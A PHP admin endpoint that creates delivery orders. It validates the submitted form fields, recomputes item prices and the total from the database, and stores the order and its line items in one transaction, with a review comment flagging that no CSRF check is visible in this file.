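<?php
declare(strict_types=1);

header('Content-Type: application/json; charset=utf-8');
include '../components/connect.php';
session_start();

// Only an authenticated admin session may create delivery orders.
$admin_id = $_SESSION['admin_id'] ?? null;
if (!$admin_id) {
    http_response_code(401);
    echo json_encode(['success' => false, 'message' => 'No autorizado']);
    exit();
}

// NOTE(review): no CSRF token or Origin check is visible in this file; the session
// cookie alone authorises this state-changing POST. connect.php is not shown here —
// confirm such a check exists upstream, or add one.

/**
 * Helper: emit a JSON error response and stop the script.
 *
 * @param string $msg  user-facing message (Spanish, like the rest of this API)
 * @param int    $code HTTP status code (default 400)
 */
function respond_error(string $msg, int $code = 400)
{
    http_response_code($code);
    echo json_encode(['success' => false, 'message' => $msg]);
    exit();
}

/**
 * Read a POST field as a trimmed string.
 *
 * A non-string value (e.g. a `field[]=x` request) is treated as absent
 * instead of letting trim() raise an uncaught TypeError.
 */
function post_string(string $key): string
{
    $value = $_POST[$key] ?? '';
    return is_string($value) ? trim($value) : '';
}

/**
 * Re-price the submitted items from the products table.
 *
 * Only the product id and quantity are read from each client item; the
 * name and prices come from the database, so client-supplied prices and
 * totals never influence what is stored. Items with unknown ids or
 * non-positive quantities are dropped.
 *
 * @param PDO   $conn  database connection
 * @param array $items decoded `order_items` payload
 * @return array{items: array, total: float} cleaned items and the server-computed total
 */
function price_items(PDO $conn, array $items): array
{
    // Collect the distinct positive ids first so the query is built only from ints.
    $ids = [];
    foreach ($items as $it) {
        $pid = is_array($it) ? (int)($it['id'] ?? 0) : 0;
        if ($pid > 0) {
            $ids[$pid] = $pid;
        }
    }
    if (empty($ids)) {
        respond_error('Items inválidos');
    }
    $ids = array_values($ids);

    // Placeholders are generated and ids are bound: no untrusted text enters the SQL string.
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $conn->prepare("SELECT id, name, price, sale_price FROM products WHERE id IN ($placeholders)");
    $stmt->execute($ids);

    $byId = [];
    foreach ($stmt->fetchAll(PDO::FETCH_ASSOC) as $p) {
        $byId[(int)$p['id']] = $p;
    }

    $cleanItems = [];
    $serverTotal = 0.0;
    foreach ($items as $item) {
        if (!is_array($item)) {
            continue;
        }
        $pid = (int)($item['id'] ?? 0);
        $qty = (int)($item['cantidad'] ?? 0);
        if ($pid <= 0 || $qty <= 0 || !isset($byId[$pid])) {
            continue;
        }
        // `price` is stored as the cost; a positive `sale_price` overrides it as the selling price.
        $costPrice = (float)$byId[$pid]['price'];
        $salePrice = isset($byId[$pid]['sale_price']) && (float)$byId[$pid]['sale_price'] > 0
            ? (float)$byId[$pid]['sale_price']
            : $costPrice;
        $serverTotal += $salePrice * $qty;
        $cleanItems[] = [
            'id'       => $pid,
            'nombre'   => $byId[$pid]['name'],
            'precio'   => $salePrice,
            'coste'    => $costPrice,
            'cantidad' => $qty,
        ];
    }

    return ['items' => $cleanItems, 'total' => $serverTotal];
}

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    respond_error('Método no permitido', 405);
}

$customer_name  = post_string('customer_name');
$phone          = post_string('phone');
$address        = post_string('address');
$payment_method = post_string('payment_method');
$notes          = post_string('notes');
$order_items    = $_POST['order_items'] ?? '';
// The client's `total_amount` is deliberately not read: the total is recomputed from DB prices.

if ($customer_name === '' || $phone === '' || $address === '' || $payment_method === '') {
    respond_error('Datos incompletos');
}

$valid_methods = ['efectivo', 'transferencia'];
if (!in_array($payment_method, $valid_methods, true)) {
    respond_error('Método de pago no válido');
}

// order_items must be a JSON string; an array-shaped field would make json_decode throw.
$items = is_string($order_items) ? json_decode($order_items, true) : null;
if (!is_array($items) || count($items) === 0) {
    respond_error('El pedido no contiene productos');
}

try {
    $priced      = price_items($conn, $items);
    $cleanItems  = $priced['items'];
    $serverTotal = $priced['total'];
    if (empty($cleanItems)) {
        respond_error('Productos no válidos');
    }

    // Order header and its detail rows are written in one transaction.
    $conn->beginTransaction();

    $insert_order = $conn->prepare("INSERT INTO `delivery_orders` (customer_name, phone, address, payment_method, notes, order_items, total_amount) VALUES (?,?,?,?,?,?,?)");
    $insert_order->execute([
        $customer_name,
        $phone,
        $address,
        $payment_method,
        $notes,
        json_encode($cleanItems, JSON_UNESCAPED_UNICODE|JSON_UNESCAPED_SLASHES),
        $serverTotal,
    ]);
    $order_id = (int)$conn->lastInsertId();

    $ins_item = $conn->prepare("INSERT INTO `delivery_order_items` (order_id, product_id, product_name, quantity, price, cost_price, subtotal) VALUES (?,?,?,?,?,?,?)");
    foreach ($cleanItems as $ci) {
        $ins_item->execute([
            $order_id,
            $ci['id'],
            $ci['nombre'],
            $ci['cantidad'],
            $ci['precio'],
            $ci['coste'],
            $ci['precio'] * $ci['cantidad'],
        ]);
    }

    $conn->commit();

    echo json_encode(['success' => true, 'order_id' => $order_id, 'total' => $serverTotal]);
} catch (Throwable $e) {
    if ($conn->inTransaction()) {
        $conn->rollBack();
    }
    // Keep the real cause in the server log; the client only receives a generic message.
    error_log('create_delivery: ' . $e->getMessage());
    respond_error('Error al guardar el pedido');
}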